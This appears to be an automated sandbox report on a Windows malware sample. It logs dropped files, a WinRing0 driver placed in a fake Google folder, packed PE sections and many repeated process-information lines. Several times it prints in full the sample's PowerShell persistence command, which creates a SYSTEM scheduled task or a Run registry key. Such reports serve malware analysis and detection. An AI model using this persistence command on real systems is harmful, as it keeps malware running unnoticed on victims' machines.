                        Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeDirectory created: C:\Program Files\Google\LibsJump to behavior
                        Source: C:\Windows\System32\cmd.exeDirectory created: C:\Program Files\Google\Libs\g.log
                        Source: ahlntQUj2t.exeStatic PE information: Image base 0x140000000 > 0x60000000
                        Source: ahlntQUj2t.exeStatic file information: File size 2137088 > 1048576
                        Source: ahlntQUj2t.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1fba00
                        Source: ahlntQUj2t.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WR64.sys.16.dr

                        Data Obfuscation

                        barindex
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" }
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }Jump to behavior
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydxtfs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GQFENPEL" } Else { "C:\Program Files\xjfgcnhmcvxy.exe" }Jump to behavior
                        Source: C:\Program Files\xjfgcnhmcvxy.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ubqexh#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GQFENPEL' /tr '''C:\Program Files\xjfgcnhmcvxy.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\xjfgcnhmcvxy.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GQFENPEL' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GQFENPEL" /t REG_SZ /f /d 'C:\Program Files\xjfgcnhmcvxy.exe' }Jump to behavior
                        Source: ahlntQUj2t.exeStatic PE information: section name: .xdata
                        Source: xjfgcnhmcvxy.exe.0.drStatic PE information: section name: .xdata
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeCode function: 0_2_00007FF624CC8146 push rbx; retf 0_2_00007FF624CC8147
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB2FD2A5 pushad ; iretd 7_2_00007FFAAB2FD2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB4183CD push ebx; retf 0009h7_2_00007FFAAB4183CA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB41832A push ebx; retf 0009h7_2_00007FFAAB4183CA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB417DDD push ebx; retf 0009h7_2_00007FFAAB417DAA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB410D20 push eax; retf 7_2_00007FFAAB410D4D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB417D28 push ebx; retf 0009h7_2_00007FFAAB417D4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB4108CD push E95B7C1Ch; ret 7_2_00007FFAAB410909
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB417D7D push ebx; retf 0009h7_2_00007FFAAB417D4A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB417D7D push ebx; retf 0009h7_2_00007FFAAB417DAA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB417DAD push ebx; retf 0009h7_2_00007FFAAB417DDA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB417967 push esp; retf 7_2_00007FFAAB417968
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB417D68 push ebx; retf 0009h7_2_00007FFAAB417D7A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFAAB422A94 push eax; ret 13_2_00007FFAAB422A59
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FFAAB4229A5 push eax; ret 13_2_00007FFAAB422A59
                        Source: C:\Program Files\xjfgcnhmcvxy.exeCode function: 16_2_00007FF723678146 push rbx; retf 16_2_00007FF723678147
                        Source: initial sampleStatic PE information: section name: UPX0
                        Source: initial sampleStatic PE information: section name: UPX1

                        Persistence and Installation Behavior

                        barindex
                        Source: C:\Program Files\xjfgcnhmcvxy.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to behavior
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeFile created: C:\Program Files\xjfgcnhmcvxy.exeJump to dropped file
                        Source: C:\Program Files\xjfgcnhmcvxy.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                        Source: C:\Program Files\xjfgcnhmcvxy.exeFile created: C:\Windows\Temp\tkfgvduf.tmpJump to dropped file
                        Source: C:\Users\user\Desktop\ahlntQUj2t.exeFile created: C:\Program Files\xjfgcnhmcvxy.exeJump to dropped file
                        Source: C:\Program Files\xjfgcnhmcvxy.exeFile created: C:\Windows\Temp\tkfgvduf.tmpJump to dropped file

                        Boot Survival

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn GQFENPEL

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Program Files\xjfgcnhmcvxy.exeModule Loaded: C:\WINDOWS\TEMP\TKFGVDUF.TMP
                        Source: C:\Program Files\xjfgcnhmcvxy.exeModule Loaded: C:\WINDOWS\TEMP\TKFGVDUF.TMP
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
